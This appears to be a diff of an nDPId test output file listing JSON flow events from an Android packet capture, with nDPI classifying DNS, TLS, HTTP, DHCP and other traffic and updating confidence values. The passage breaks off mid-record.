+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1582454867151,"flow_last_seen":1582454867312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":715,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866407,"flow_last_seen":1582454866538,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454792980,"flow_last_seen":1582454853081,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1530,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866448,"flow_last_seen":1582454868606,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} +00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1582454867688,"flow_last_seen":1582454868211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5497,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871042,"flow_last_seen":1582454871531,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6624,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1582454871069,"flow_last_seen":1582454872035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5325,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871075,"flow_last_seen":1582454871428,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454865802,"flow_last_seen":1582454866026,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454871152,"flow_last_seen":1582454871906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871321,"flow_last_seen":1582454871375,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3562,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454871623,"flow_last_seen":1582454871978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6380,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454871839,"flow_last_seen":1582454872035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 
-00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1582454871094,"flow_last_seen":1582454871395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1510,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454871745,"flow_last_seen":1582454871859,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":755,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1582454871094,"flow_last_seen":1582454871395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1510,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454871745,"flow_last_seen":1582454871859,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":755,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454796360,"flow_last_seen":1582454856384,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1582454868511,"flow_last_seen":1582454870126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868527,"flow_last_seen":1582454869366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867323,"flow_last_seen":1582454867358,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454796360,"flow_last_seen":1582454856384,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868511,"flow_last_seen":1582454870126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
